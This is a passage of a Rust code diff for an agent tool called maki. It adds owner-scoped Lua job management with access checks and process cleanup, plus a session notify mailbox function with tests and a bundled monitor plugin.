         parent_event_tx: parent_tx,
         subagent_info,
         local_tools: Arc::new(local_map),
@@ -686,7 +689,10 @@ struct SessionState {
     parent_cancels: Arc<CancelMap<String>>,
     /// Stable identity for UI, cancel, and history. Falls back to a synthetic
     /// id for workflow-mode sessions (no model-issued tool call exists).
+    /// Shared with any sibling session the same tool call opened.
     ui_id: String,
+    /// Which registration under [`ui_id`](Self::ui_id) is ours.
+    cancel_slot: CancelSlot,
     parent_event_tx: EventSender,
     subagent_info: Arc<OnceLock<SubagentInfo>>,
     local_tools: LocalTools,
@@ -703,7 +709,7 @@ impl SessionState {
             return;
         }
         self.closed = true;
-        self.parent_cancels.remove(&self.ui_id);
+        self.parent_cancels.retire(&self.ui_id, self.cancel_slot);
         let messages = std::mem::replace(&mut self.history, History::new(Vec::new())).into_vec();
         let _ = self.parent_event_tx.send(AgentEvent::SubagentHistory {
             tool_use_id: self.ui_id.clone(),

--- a/maki-lua/src/api/agent.rs
+++ b/maki-lua/src/api/agent.rs
@@ -540,6 +540,7 @@ async fn session(
             tool_output_lines: maki_config::ToolOutputLines::default(),
             permissions: Arc::clone(&agent_ctx.permissions),
             session_id: agent_ctx.session_id.clone(),
+            mailbox: agent_ctx.mailbox.clone(),
             timeouts: agent_ctx.timeouts,
             file_tracker: FileReadTracker::fresh(),
             prompt_slots: Arc::clone(&agent_ctx.prompt_slots),

--- a/maki-lua/src/api/fn.rs
+++ b/maki-lua/src/api/fn.rs
@@ -3,6 +3,7 @@ use std::env;
 use std::io::{BufRead, BufReader};
 use std::path::Path;
 use std::process::{Command, Stdio};
+use std::sync::Arc;
 use std::thread;
 use std::time::Duration;
 
@@ -12,7 +13,7 @@ use mlua::{Function, Lua, RegistryKey, Result as LuaResult, Table, Value};
 use crate::api::fs::expand_tilde;
 use crate::api::util::command::{Pair, UiAction, err_pair, ui_roundtrip, ui_send};
 use crate::plugin_permissions::PluginPermissions;
-use crate::runtime::with_task_jobs;
+use crate::runtime::{active_task_id, with_jobs};
 
 const READER_BUF_SIZE: usize = 8 * 1024;
 
@@ -23,9 +24,15 @@ pub(crate) enum JobEvent {
     Exit(i32),
 }
 
+#[derive(Clone, PartialEq, Eq)]
+pub(crate) enum JobOwner {
+    Task(u64),
+    Plugin(Arc<str>),
+}
+
 struct JobMeta {
+    owner: JobOwner,
     pid: u32,
-    alive: bool,
     on_stdout: Option<RegistryKey>,
     on_stderr: Option<RegistryKey>,
     on_exit: Option<RegistryKey>,
@@ -37,6 +44,12 @@ pub(crate) struct JobStore {
     next_id: u32,
 }
 
+struct CheckedOutReceiver {
+    lua: Lua,
+    job_id: u32,
+    receiver: Option<flume::Receiver<JobEvent>>,
+}
+
 impl JobStore {
     pub fn new() -> Self {
         Self {
@@ -45,8 +58,10 @@ impl JobStore {
         }
     }
 
+    #[allow(clippy::too_many_arguments)]
     pub fn start(
         &mut self,
+        owner: JobOwner,
         cmd: &str,
         cwd: Option<String>,
         env: Option<HashMap<String, String>>,
@@ -136,8 +151,8 @@ impl JobStore {
         self.jobs.insert(
             id,
             JobMeta {
+                owner,
                 pid,
-                alive: true,
                 on_stdout,
                 on_stderr,
                 on_exit,
@@ -148,12 +163,8 @@ impl JobStore {
         Ok(id)
     }
 
-    pub fn has_alive_jobs(&self) -> bool {
-        self.jobs.values().any(|j| j.alive)
-    }
-
-    pub fn is_empty(&self) -> bool {
-        self.jobs.is_empty()
+    pub fn is_empty(&self, owner: &JobOwner) -> bool {
+        !self.jobs.values().any(|job| job.owner == *owner)
     }
 
     pub fn callback_key(&self, job_id: u32, event: &JobEvent) -> Option<&RegistryKey> {
@@ -165,15 +176,29 @@ impl JobStore {
         }
     }
 
-    pub fn take_receiver(&mut self, job_id: u32) -> Option<flume::Receiver<JobEvent>> {
-        let meta = self.jobs.get_mut(&job_id)?;
-        meta.event_rx.take()
+    pub fn take_receiver(
+        &mut self,
+        job_id: u32,
+        task_id: Option<u64>,
+        plugin: &str,
+    ) -> Option<flume::Receiver<JobEvent>> {
+        let job = self.jobs.get_mut(&job_id)?;
+        job.can_access(task_id, plugin)
+            .then(|| job.event_rx.take())?
     }
 
-    pub fn drain_events(&self, buf: &mut Vec<(u32, JobEvent)>) {
+    pub fn restore_receiver(&mut self, job_id: u32, receiver: flume::Receiver<JobEvent>) {
+        if let Some(job) = self.jobs.get_mut(&job_id)
+            && job.event_rx.is_none()
+        {
+            job.event_rx = Some(receiver);
+        }
+    }
+
+    pub fn drain_events(&self, owner: &JobOwner, buf: &mut Vec<(u32, JobEvent)>) {
         buf.clear();
-        for (&id, meta) in &self.jobs {
-            if let Some(ref rx) = meta.event_rx {
+        for (&id, job) in self.jobs.iter().filter(|(_, job)| job.owner == *owner) {
+            if let Some(ref rx) = job.event_rx {
                 while let Ok(event) = rx.try_recv() {
                     buf.push((id, event));
                 }
@@ -181,31 +206,50 @@ impl JobStore {
         }
     }
 
-    pub fn mark_dead(&mut self, job_id: u32) {
-        if let Some(meta) = self.jobs.get_mut(&job_id) {
-            meta.alive = false;
-        }
-    }
-
-    pub fn kill(&mut self, job_id: u32) {
-        if let Some(meta) = self.jobs.get_mut(&job_id)
-            && meta.alive
+    pub fn drain_plugin_events(&self, buf: &mut Vec<(u32, JobEvent)>) {
+        buf.clear();
+        for (&id, job) in self
+            .jobs
+            .iter()
+            .filter(|(_, job)| matches!(job.owner, JobOwner::Plugin(_)))
         {
-            kill_job(meta);
-        }
-    }
-
-    pub fn kill_all(&mut self) {
-        for meta in self.jobs.values_mut() {
-            if meta.alive {
-                kill_job(meta);
+            if let Some(ref rx) = job.event_rx {
+                while let Ok(event) = rx.try_recv() {
+                    buf.push((id, event));
+                }
             }
         }
     }
 
-    pub fn clear(&mut self, lua: &Lua) {
-        for (_, meta) in self.jobs.drain() {
-            for key in [meta.on_stdout, meta.on_stderr, meta.on_exit]
+    pub fn kill(&mut self, job_id: u32, task_id: Option<u64>, plugin: &str) {
+        if let Some(job) = self.jobs.get_mut(&job_id)
+            && job.can_access(task_id, plugin)
+        {
+            kill_job(job);
+        }
+    }
+
+    pub fn kill_owner(&mut self, lua: &Lua, owner: &JobOwner) {
+        let ids = self
+            .jobs
+            .iter()
+            .filter_map(|(&id, job)| (job.owner == *owner).then_some(id))
+            .collect::<Vec<_>>();
+        for id in ids {
+            self.remove(lua, id, true);
+        }
+    }
+
+    pub fn finish(&mut self, lua: &Lua, job_id: u32) {
+        self.remove(lua, job_id, false);
+    }
+
+    fn remove(&mut self, lua: &Lua, job_id: u32, kill: bool) {
+        if let Some(mut job) = self.jobs.remove(&job_id) {
+            if kill {
+                kill_job(&mut job);
+            }
+            for key in [job.on_stdout, job.on_stderr, job.on_exit]
                 .into_iter()
                 .flatten()
             {
@@ -213,15 +257,50 @@ impl JobStore {
             }
         }
     }
+
+    fn kill_all(&mut self) {
+        for job in self.jobs.values_mut() {
+            kill_job(job);
+        }
+    }
 }
 
-/// Every job is its own process group, so one we forget keeps running
-/// after maki is gone. `TaskScope::drop` handles the usual path; this
-/// catches the rest, like the warm click cell that is dropped without a
-/// scope, and a panic unwinding past the cleanup.
 impl Drop for JobStore {
     fn drop(&mut self) {
         self.kill_all();
+    }
+}
+
+impl CheckedOutReceiver {
+    fn new(lua: &Lua, job_id: u32, receiver: flume::Receiver<JobEvent>) -> Self {
+        Self {
+            lua: lua.clone(),
+            job_id,
+            receiver: Some(receiver),
+        }
+    }
+
+    fn get(&self) -> &flume::Receiver<JobEvent> {
+        self.receiver.as_ref().expect("receiver is checked out")
+    }
+}
+
+impl Drop for CheckedOutReceiver {
+    fn drop(&mut self) {
+        if let Some(receiver) = self.receiver.take() {
+            with_jobs(&self.lua, |store| {
+                store.restore_receiver(self.job_id, receiver);
+            });
+        }
+    }
+}
+
+impl JobMeta {
+    fn can_access(&self, task_id: Option<u64>, plugin: &str) -> bool {
+        match &self.owner {
+            JobOwner::Task(owner_id) => task_id == Some(*owner_id),
+            JobOwner::Plugin(owner_plugin) => owner_plugin.as_ref() == plugin,
+        }
     }
 }
 
@@ -275,6 +354,9 @@ fn kill_job(meta: &mut JobMeta) {
 ///   `on_stdout` (function?) called with `(job_id, line)` for each stdout line.
 ///   `on_stderr` (function?) called with `(job_id, line)` for each stderr line.
 ///   `on_exit` (function?) called with `(job_id, code)` when the process finishes.
+///   `owner` (string?) job lifetime. `"task"` (default) ends the job with
+///     the current call. `"plugin"` keeps it alive until the plugin unloads
+///     or reloads.
 /// @return (integer) Job id.
 /// @example
 /// local id = maki.fn.jobstart("ls -la", {
@@ -283,7 +365,29 @@ fn kill_job(meta: &mut JobMeta) {
 ///   on_exit = function(_, code) print("exit: " .. code) end,
 /// })
 #[lua_fn(guard = Run)]
-fn jobstart(lua: &Lua, cmd: String, opts: Option<Table>) -> LuaResult<u32> {
+fn jobstart(
+    lua: &Lua,
+    #[ctx] plugin: Arc<str>,
+    cmd: String,
+    opts: Option<Table>,
+) -> LuaResult<u32> {
+    let owner_name: Option<String> = opts
+        .as_ref()
+        .map(|opts| opts.get("owner"))
+        .transpose()?
+        .flatten();
+    let owner = match owner_name.as_deref() {
+        None | Some("task") => active_task_id(lua).map(JobOwner::Task).ok_or_else(|| {
+            mlua::Error::runtime("jobstart: no active task; use owner = \"plugin\"")
+        })?,
+        Some("plugin") => JobOwner::Plugin(Arc::clone(&plugin)),
+        Some(other) => {
+            return Err(mlua::Error::runtime(format!(
+                "jobstart: unknown owner {other:?}; expected \"task\" or \"plugin\""
+            )));
+        }
+    };
+
     let (cwd, env, on_stdout, on_stderr, on_exit) = match opts {
         Some(ref opts) => {
             let cwd: Option<String> = opts.get("cwd").ok();
@@ -311,8 +415,8 @@ fn jobstart(lua: &Lua, cmd: String, opts: Option<Table>) -> LuaResult<u32> {
         None => (None, None, None, None, None),
     };
 
-    with_task_jobs(lua, |store| {
-        store.start(&cmd, cwd, env, on_stdout, on_stderr, on_exit)
+    with_jobs(lua, |store| {
+        store.start(owner, &cmd, cwd, env, on_stdout, on_stderr, on_exit)
     })
     .map_err(mlua::Error::runtime)
 }
@@ -325,8 +429,9 @@ fn jobstart(lua: &Lua, cmd: String, opts: Option<Table>) -> LuaResult<u32> {
 /// @example
 /// maki.fn.jobstop(id)
 #[lua_fn(guard = Run)]
-fn jobstop(lua: &Lua, job_id: u32) -> LuaResult<()> {
-    with_task_jobs(lua, |store| store.kill(job_id));
+fn jobstop(lua: &Lua, #[ctx] plugin: Arc<str>, job_id: u32) -> LuaResult<()> {
+    let task_id = active_task_id(lua);
+    with_jobs(lua, |store| store.kill(job_id, task_id, &plugin));
     Ok(())
 }
 
@@ -348,9 +453,16 @@ fn jobstop(lua: &Lua, job_id: u32) -> LuaResult<()> {
 ///   print(result.stdout)
 /// end
 #[lua_fn(guard = Run)]
-async fn jobwait(lua: Lua, job_id: u32, timeout_ms: Option<u64>) -> LuaResult<Value> {
-    let rx = with_task_jobs(&lua, |store| store.take_receiver(job_id))
+async fn jobwait(
+    lua: Lua,
+    #[ctx] plugin: Arc<str>,
+    job_id: u32,
+    timeout_ms: Option<u64>,
+) -> LuaResult<Value> {
+    let task_id = active_task_id(&lua);
+    let receiver = with_jobs(&lua, |store| store.take_receiver(job_id, task_id, &plugin))
         .ok_or_else(|| mlua::Error::runtime("unknown job id or already waited"))?;
+    let receiver = CheckedOutReceiver::new(&lua, job_id, receiver);
 
     let timeout = Duration::from_millis(timeout_ms.unwrap_or(30_000));
     let deadline = smol::Timer::after(timeout);
@@ -360,11 +472,12 @@ async fn jobwait(lua: Lua, job_id: u32, timeout_ms: Option<u64>) -> LuaResult<Va
     let mut stderr_lines = Vec::new();
 
     let exit_code = loop {
-        let event = futures_lite::future::or(async { rx.recv_async().await.ok() }, async {
-            (&mut deadline).await;
-            None
-        })
-        .await;
+        let event =
+            futures_lite::future::or(async { receiver.get().recv_async().await.ok() }, async {
+                (&mut deadline).await;
+                None
+            })
+            .await;
 
         let Some(event) = event else {
             return Ok(mlua::Value::Nil);
@@ -388,11 +501,14 @@ async fn jobwait(lua: Lua, job_id: u32, timeout_ms: Option<u64>) -> LuaResult<Va
 /// dead on exit. Shared by `jobwait` and the async dispatch loop so
 /// both deliver events identically.
 pub(crate) fn deliver_job_event(lua: &Lua, job_id: u32, event: &JobEvent) -> LuaResult<()> {
-    let callback = with_task_jobs(lua, |store| {
+    let callback = with_jobs(lua, |store| {
         store
             .callback_key(job_id, event)
             .and_then(|key| lua.registry_value::<Function>(key).ok())
     });
+    if let JobEvent::Exit(_) = event {
+        with_jobs(lua, |store| store.finish(lua, job_id));
+    }
     if let Some(callback) = callback {
         let arg = match event {
             JobEvent::Stdout(line) | JobEvent::Stderr(line) => {
@@ -401,9 +517,6 @@ pub(crate) fn deliver_job_event(lua: &Lua, job_id: u32, event: &JobEvent) -> Lua
             JobEvent::Exit(code) => Value::Integer(*code as i64),
         };
         callback.call::<()>((job_id, arg))?;
-    }
-    if let JobEvent::Exit(_) = event {
-        with_task_jobs(lua, |store| store.mark_dead(job_id));
     }
     Ok(())
 }
@@ -495,10 +608,11 @@ lua_table! {
     /// })
     /// ```
     "maki.fn" => pub(crate) fn create_fn_table(
+        plugin: Arc<str>,
         perms: &PluginPermissions,
         tx: Option<flume::Sender<UiAction>>,
     ), DOCS [
-        jobstart(perms), jobstop(perms), jobwait(perms), executable(perms),
+        jobstart(perms, plugin), jobstop(perms, plugin), jobwait(perms, plugin), executable(perms),
         winsaveview(tx), winrestview(tx),
     ]
 }
@@ -508,13 +622,23 @@ mod tests {
     use super::*;
     use crate::api::util::command::{NO_UI_ERR, WinView};
 
+    const TEST_PLUGIN: &str = "test-plugin";
+
     fn make_store() -> JobStore {
         JobStore::new()
     }
 
+    fn task_owner(id: u64) -> JobOwner {
+        JobOwner::Task(id)
+    }
+
+    fn plugin_owner() -> JobOwner {
+        JobOwner::Plugin(Arc::from(TEST_PLUGIN))
+    }
+
     fn start_echo(store: &mut JobStore) -> u32 {
         store
-            .start("echo hello", None, None, None, None, None)
+            .start(task_owner(1), "echo hello", None, None, None, None, None)
             .unwrap()
     }
 
@@ -523,31 +647,37 @@ mod tests {
         unsafe { libc::killpg(pid as libc::pid_t, 0) == 0 }
     }
 
-    /// The warm click cell is dropped without ever going through
-    /// `TaskScope`, so without this the process outlives maki.
+    #[cfg(unix)]
+    fn wait_for_group_exit(pid: u32) -> bool {
+        (0..500).any(|_| {
+            thread::sleep(Duration::from_millis(10));
+            !group_alive(pid)
+        })
+    }
+
     #[cfg(unix)]
     #[test]
     fn dropping_the_store_kills_its_jobs() {
         let mut store = make_store();
         let id = store
-            .start("sleep 30", None, None, None, None, None)
+            .start(task_owner(1), "sleep 30", None, None, None, None, None)
             .expect("job started");
         let pid = store.jobs[&id].pid;
         assert!(group_alive(pid), "job should be running before the drop");
 
         drop(store);
 
-        let gone = (0..500).any(|_| {
-            std::thread::sleep(std::time::Duration::from_millis(10));
-            !group_alive(pid)
-        });
-        assert!(gone, "dropping the store must not orphan the process group");
+        assert!(
+            wait_for_group_exit(pid),
+            "dropping the store must not orphan the process group"
+        );
     }
 
     #[test]
     fn start_invalid_cwd_returns_error() {
         let mut store = make_store();
         let result = store.start(
+            task_owner(1),
             "echo hello",
             Some("/nonexistent_dir_abc_xyz_123".into()),
             None,
@@ -559,41 +689,102 @@ mod tests {
     }
 
     #[test]
-    fn has_alive_jobs_tracks_state() {
+    fn finishing_a_job_removes_it() {
+        let lua = Lua::new();
         let mut store = make_store();
-        assert!(!store.has_alive_jobs());
+        let owner = task_owner(1);
+        assert!(store.is_empty(&owner));
 
         let id = start_echo(&mut store);
-        assert!(store.has_alive_jobs());
+        assert!(!store.is_empty(&owner));
+        let receiver = store.take_receiver(id, Some(1), TEST_PLUGIN).unwrap();
+        while !matches!(
+            receiver.recv_timeout(Duration::from_secs(5)).unwrap(),
+            JobEvent::Exit(_)
+        ) {}
 
-        store.mark_dead(id);
-        assert!(!store.has_alive_jobs());
+        store.finish(&lua, id);
+        assert!(store.is_empty(&owner));
     }
 
     #[test]
-    fn noop_on_nonexistent_or_dead_jobs() {
+    fn unknown_job_operations_are_noops() {
         let mut store = make_store();
-        store.mark_dead(999);
-        store.kill(999);
-
-        let id = start_echo(&mut store);
-        store.mark_dead(id);
-        store.kill(id);
-
+        store.kill(999, Some(1), TEST_PLUGIN);
+        assert!(store.take_receiver(999, Some(1), TEST_PLUGIN).is_none());
         assert!(store.callback_key(999, &JobEvent::Exit(0)).is_none());
     }
 
     #[test]
     fn take_receiver_lifecycle() {
         let mut store = make_store();
-        assert!(store.take_receiver(999).is_none());
+        assert!(store.take_receiver(999, Some(1), TEST_PLUGIN).is_none());
 
         let id = start_echo(&mut store);
-        assert!(store.take_receiver(id).is_some());
         assert!(
-            store.take_receiver(id).is_none(),
+            store.take_receiver(id, Some(2), TEST_PLUGIN).is_none(),
+            "another task must not access the job"
+        );
+        assert!(store.take_receiver(id, Some(1), TEST_PLUGIN).is_some());
+        assert!(
+            store.take_receiver(id, Some(1), TEST_PLUGIN).is_none(),
             "second take should fail (receiver already moved)"
         );
+    }
+
+    #[test]
+    fn plugin_owner_can_be_accessed_only_by_its_plugin() {
+        let mut store = make_store();
+        let id = store
+            .start(plugin_owner(), "echo hello", None, None, None, None, None)
+            .unwrap();
+
+        assert!(store.take_receiver(id, Some(1), "other-plugin").is_none());
+        assert!(store.take_receiver(id, None, TEST_PLUGIN).is_some());
+    }
+
+    #[cfg(unix)]
+    #[test]
+    fn kill_requires_owner_access() {
+        let lua = Lua::new();
+        let mut store = make_store();
+        let id = store
+            .start(task_owner(1), "sleep 30", None, None, None, None, None)
+            .unwrap();
+        let pid = store.jobs[&id].pid;
+
+        store.kill(id, Some(2), TEST_PLUGIN);
+        assert!(group_alive(pid));
+
+        store.kill(id, Some(1), TEST_PLUGIN);
+        assert!(wait_for_group_exit(pid));
+        store.finish(&lua, id);
+    }
+
+    #[cfg(unix)]
+    #[test]
+    fn owner_cleanup_is_isolated() {
+        let lua = Lua::new();
+        let mut store = make_store();
+        let task = task_owner(1);
+        let plugin = plugin_owner();
+        let task_id = store
+            .start(task.clone(), "sleep 30", None, None, None, None, None)
+            .unwrap();
+        let plugin_id = store
+            .start(plugin.clone(), "sleep 30", None, None, None, None, None)
+            .unwrap();
+        let task_pid = store.jobs[&task_id].pid;
+        let plugin_pid = store.jobs[&plugin_id].pid;
+
+        store.kill_owner(&lua, &task);
+
+        assert!(store.is_empty(&task));
+        assert!(!store.is_empty(&plugin));
+        assert!(wait_for_group_exit(task_pid));
+        assert!(group_alive(plugin_pid));
+        store.kill_owner(&lua, &plugin);
+        assert!(wait_for_group_exit(plugin_pid));
     }
 
     #[test]
@@ -617,7 +808,7 @@ mod tests {
     fn take_receiver_delivers_events() {
         let mut store = make_store();
         let id = start_echo(&mut store);
-        let rx = store.take_receiver(id).unwrap();
+        let rx = store.take_receiver(id, Some(1), TEST_PLUGIN).unwrap();
 
         let mut got_exit = false;
         let deadline = std::time::Instant::now() + Duration::from_secs(5);
@@ -636,14 +827,17 @@ mod tests {
     }
 
     #[test]
-    fn drain_events_collects_from_all_jobs() {
+    fn drain_events_filters_by_owner() {
         let mut store = make_store();
         let id = start_echo(&mut store);
+        let plugin_id = store
+            .start(plugin_owner(), "echo plugin", None, None, None, None, None)
+            .unwrap();
 
         let mut buf = Vec::new();
         let deadline = std::time::Instant::now() + Duration::from_secs(5);
         loop {
-            store.drain_events(&mut buf);
+            store.drain_events(&task_owner(1), &mut buf);
             if buf
                 .iter()
                 .any(|(jid, e)| *jid == id && matches!(e, JobEvent::Exit(_)))
@@ -655,16 +849,33 @@ mod tests {
             }
             std::thread::sleep(Duration::from_millis(50));
         }
+        assert!(buf.iter().all(|(job_id, _)| *job_id != plugin_id));
+
+        let deadline = std::time::Instant::now() + Duration::from_secs(5);
+        loop {
+            store.drain_plugin_events(&mut buf);
+            if buf
+                .iter()
+                .any(|(job_id, event)| *job_id == plugin_id && matches!(event, JobEvent::Exit(_)))
+            {
+                break;
+            }
+            if std::time::Instant::now() > deadline {
+                panic!("should receive plugin job exit event");
+            }
+            thread::sleep(Duration::from_millis(50));
+        }
+        assert!(buf.iter().all(|(job_id, _)| *job_id != id));
     }
 
     #[test]
     fn drain_events_empty_after_take() {
         let mut store = make_store();
         let id = start_echo(&mut store);
-        let _rx = store.take_receiver(id).unwrap();
+        let _rx = store.take_receiver(id, Some(1), TEST_PLUGIN).unwrap();
 
         let mut buf = Vec::new();
-        store.drain_events(&mut buf);
+        store.drain_events(&task_owner(1), &mut buf);
         assert!(
             buf.is_empty(),
             "drained receiver yields no events via drain_events"
@@ -733,5 +944,63 @@ mod tests {
             panic!("expected winrestview request");
         };
         assert_eq!(scroll_top, expected);
+    }
+
+    #[test]
+    fn exit_cleanup_runs_before_a_failing_callback() {
+        let lua = Lua::new();
+        lua.set_app_data(JobStore::new());
+        let callback = lua
+            .create_function(|_, ()| Err::<(), _>(mlua::Error::runtime("callback failed")))
+            .unwrap();
+        let callback_key = lua.create_registry_value(callback).unwrap();
+        with_jobs(&lua, |store| {
+            store.jobs.insert(
+                1,
+                JobMeta {
+                    owner: task_owner(1),
+                    pid: 0,
+                    on_stdout: None,
+                    on_stderr: None,
+                    on_exit: Some(callback_key),
+                    event_rx: None,
+                },
+            );
+        });
+
+        assert!(deliver_job_event(&lua, 1, &JobEvent::Exit(0)).is_err());
+        assert!(with_jobs(&lua, |store| store.is_empty(&task_owner(1))));
+    }
+
+    #[test]
+    fn finish_releases_callback_registry_values() {
+        let lua = Lua::new();
+        let capture = Arc::new(());
+        let callback_capture = Arc::clone(&capture);
+        let callback = lua
+            .create_function(move |_, ()| {
+                let _ = &callback_capture;
+                Ok(())
+            })
+            .unwrap();
+        let callback_key = lua.create_registry_value(callback).unwrap();
+        let mut store = make_store();
+        store.jobs.insert(
+            1,
+            JobMeta {
+                owner: task_owner(1),
+                pid: 0,
+                on_stdout: Some(callback_key),
+                on_stderr: None,
+                on_exit: None,
+                event_rx: None,
+            },
+        );
+        assert_eq!(Arc::strong_count(&capture), 2);
+
+        store.finish(&lua, 1);
+        lua.gc_collect().unwrap();
+
+        assert_eq!(Arc::strong_count(&capture), 1);
     }
 }

--- a/maki-lua/src/api/mod.rs
+++ b/maki-lua/src/api/mod.rs
@@ -65,7 +65,10 @@ pub(crate) fn create_maki_global(
         "ui",
         ui::create_ui_table(lua, ui_action_tx.clone(), Arc::clone(&plugin))?,
     )?;
-    maki.set("fn", r#fn::create_fn_table(lua, permissions, ui_action_tx)?)?;
+    maki.set(
+        "fn",
+        r#fn::create_fn_table(lua, Arc::clone(&plugin), permissions, ui_action_tx)?,
+    )?;
     split::split__register(&maki, lua)?;
     maki.set("async", r#async::create_async_table(lua)?)?;
     maki.set(

--- a/maki-lua/src/api/session.rs
+++ b/maki-lua/src/api/session.rs
@@ -1,12 +1,17 @@
-//! `maki.session`: host session primitives. Every call round-trips to the UI
-//! event loop, which owns the live session runtimes and the session store;
-//! the loop answers `list` from a background task so slow scans never block.
+//! `maki.session`: host session primitives. Session management round-trips to
+//! the UI event loop, which owns live runtimes and storage. `notify` posts
+//! directly to the agent mailbox so synchronous callbacks can use it.
 
+use maki_agent::SessionMailbox;
 use maki_lua_macro::{lua_fn, lua_table};
-use mlua::{Lua, Result as LuaResult, Table};
+use maki_storage::id::MakiId;
+use mlua::{Lua, Result as LuaResult, Table, Value};
 
 use crate::api::util::command::{Pair, SessionRequest, UiAction, err_pair, ui_roundtrip};
 use crate::api::util::convert::json_to_lua;
+
+const BLANK_NOTIFY_ERR: &str = "text must not be blank";
+const SESSION_REQUIRED_ERR: &str = "session is required";
 
 async fn roundtrip(
     lua: Lua,
@@ -128,6 +133,38 @@ async fn prompt(
     roundtrip(lua, tx, SessionRequest::Prompt { id, text }).await
 }
 
+/// Reports {text} to a live session without creating a user turn. The
+/// observation waits for the session's next agent run.
+///
+/// @param text string What to report. Must not be blank.
+/// @param opts table Options:
+///   `session` (string) id of a live session.
+///   `wake` (boolean) start a TUI turn when it next becomes idle (default false).
+/// @return (boolean|nil, string|nil) true, or nil and an error.
+/// @example
+/// maki.session.notify("[monitor] deploy failed", { session = id, wake = true })
+#[lua_fn]
+fn notify(_lua: &Lua, text: String, opts: Option<Table>) -> LuaResult<Pair> {
+    if text.trim().is_empty() {
+        return Ok(err_pair(BLANK_NOTIFY_ERR));
+    }
+    let Some(opts) = opts else {
+        return Ok(err_pair(SESSION_REQUIRED_ERR));
+    };
+    let Some(raw_id) = opts.get::<Option<String>>("session")? else {
+        return Ok(err_pair(SESSION_REQUIRED_ERR));
+    };
+    let session_id: MakiId = match raw_id.parse() {
+        Ok(id) => id,
+        Err(error) => return Ok(err_pair(error)),
+    };
+    let wake = opts.get("wake").unwrap_or(false);
+    if let Err(error) = SessionMailbox::notify(session_id, text, wake) {
+        return Ok(err_pair(error));
+    }
+    Ok((Value::Boolean(true), None))
+}
+
 /// Renames a session, live or stored.
 ///
 /// @param opts table Required fields: id (string) session to rename;
@@ -151,11 +188,11 @@ async fn set_title(
 lua_table! {
     /// Host session primitives. The interactive UI can run several sessions
     /// at once; these functions let plugins list, create, focus, rename, and
-    /// delete them. Every call round-trips to the UI event loop and returns
-    /// the pair `(value, err)`. Without an interactive UI attached, every
-    /// call returns `nil, "no interactive UI attached"`.
+    /// delete them. Session management returns `nil, "no interactive UI
+    /// attached"` without a UI. `notify` instead targets a live agent mailbox
+    /// directly, so it also works under ACP and SDK frontends.
     "maki.session" => pub(crate) fn create_session_table(tx: Option<flume::Sender<UiAction>>),
-    DOCS [list(tx), live(tx), current(tx), focus(tx), delete(tx), new(tx), prompt(tx), set_title(tx)]
+    DOCS [list(tx), live(tx), current(tx), focus(tx), delete(tx), new(tx), prompt(tx), notify(), set_title(tx)]
 }
 
 #[cfg(test)]
@@ -225,6 +262,77 @@ mod tests {
         checker.join().unwrap();
         assert_eq!(err, None);
         assert_eq!(val, "queued");
+    }
+
+    #[test]
+    fn notify_is_synchronous_and_queues_an_observation() {
+        let id = MakiId::generate();
+        let mailbox = SessionMailbox::register(id);
+        let (tx, rx) = flume::unbounded::<UiAction>();
+        let lua = lua_with_session(Some(tx));
+        lua.globals().set("session_id", id.to_string()).unwrap();
+
+        let (value, error): (bool, Option<String>) = lua
+            .load("return session.notify('built', { session = session_id })")
+            .eval()
+            .unwrap();
+
+        assert!(value);
+        assert_eq!(error, None);
+        let messages = mailbox.drain();
+        assert_eq!(messages.len(), 1);
+        assert!(messages[0].is_observation());
+        assert_eq!(messages[0].user_text(), Some("built"));
+        assert!(rx.try_recv().is_err());
+    }
+
+    #[test]
+    fn waking_notify_sets_the_mailbox_wake_flag() {
+        let id = MakiId::generate();
+        let mailbox = SessionMailbox::register(id);
+        let lua = lua_with_session(None);
+        lua.globals().set("session_id", id.to_string()).unwrap();
+
+        let (value, error): (bool, Option<String>) = lua
+            .load("return session.notify('failed', { session = session_id, wake = true })")
+            .eval()
+            .unwrap();
+
+        assert!(value);
+        assert_eq!(error, None);
+        assert_eq!(mailbox.claim_wake().len(), 1);
+    }
+
+    #[test]
+    fn notify_rejects_missing_and_non_live_sessions() {
+        let lua = lua_with_session(None);
+        let (_, missing): (Value, Option<String>) =
+            lua.load("return session.notify('built')").eval().unwrap();
+        assert_eq!(missing.as_deref(), Some(SESSION_REQUIRED_ERR));
+
+        let id = MakiId::generate();
+        lua.globals().set("session_id", id.to_string()).unwrap();
+        let (_, not_live): (Value, Option<String>) = lua
+            .load("return session.notify('built', { session = session_id })")
+            .eval()
+            .unwrap();
+        assert_eq!(not_live, Some(format!("session not live: {id}")));
+    }
+
+    #[test]
+    fn notify_rejects_blank_text_and_invalid_session_ids() {
+        let lua = lua_with_session(None);
+        let (_, blank): (Value, Option<String>) = lua
+            .load("return session.notify(' ', { session = 'invalid' })")
+            .eval()
+            .unwrap();
+        assert_eq!(blank.as_deref(), Some(BLANK_NOTIFY_ERR));
+
+        let (_, invalid): (Value, Option<String>) = lua
+            .load("return session.notify('built', { session = 'invalid' })")
+            .eval()
+            .unwrap();
+        assert!(invalid.is_some_and(|error| error.contains("invalid base58")));
     }
 
     #[test]

--- a/maki-lua/src/loader.rs
+++ b/maki-lua/src/loader.rs
@@ -72,6 +72,10 @@ static BUNDLED_PLUGINS: &[BundledPlugin] = &[
         dir: include_dir!("$CARGO_MANIFEST_DIR/../plugins/question"),
     },
     BundledPlugin {
+        name: "monitor",
+        dir: include_dir!("$CARGO_MANIFEST_DIR/../plugins/monitor"),
+    },
+    BundledPlugin {
         name: "todo_write",
         dir: include_dir!("$CARGO_MANIFEST_DIR/../plugins/todo_write"),
     },

--- a/maki-lua/src/runtime.rs
+++ b/maki-lua/src/runtime.rs
@@ -7,7 +7,7 @@ use std::path::PathBuf;
 use std::pin::Pin;
 use std::ptr;
 use std::rc::Rc;
-use std::sync::atomic::{AtomicBool, AtomicPtr, Ordering};
+use std::sync::atomic::{AtomicBool, AtomicPtr, AtomicU64, Ordering};
 use std::sync::{Arc, Mutex, Weak};
 use std::thread::{self, JoinHandle};
 use std::time::{Duration, Instant};
@@ -28,7 +28,7 @@ use maki_config::RawConfig;
 
 use crate::api::autocmd::AutocmdStore;
 use crate::api::create_maki_global;
-use crate::api::r#fn::{JobStore, deliver_job_event};
+use crate::api::r#fn::{JobOwner, JobStore, deliver_job_event};
 use crate::api::keymap::KeymapReader;
 use crate::api::keymap::{KeymapStore, KeymapWriter};
 use crate::api::options::{PluginOptionSpecs, PluginOpts, collect_plugin_options};
@@ -83,6 +83,7 @@ const ASYNC_RUN_DEFAULT_DEADLINE: Duration = Duration::from_secs(60);
 const RESTORE_SPAWN_ROUNDS: usize = 8;
 /// Keeps a buggy plugin's restore task from freezing the lua loop.
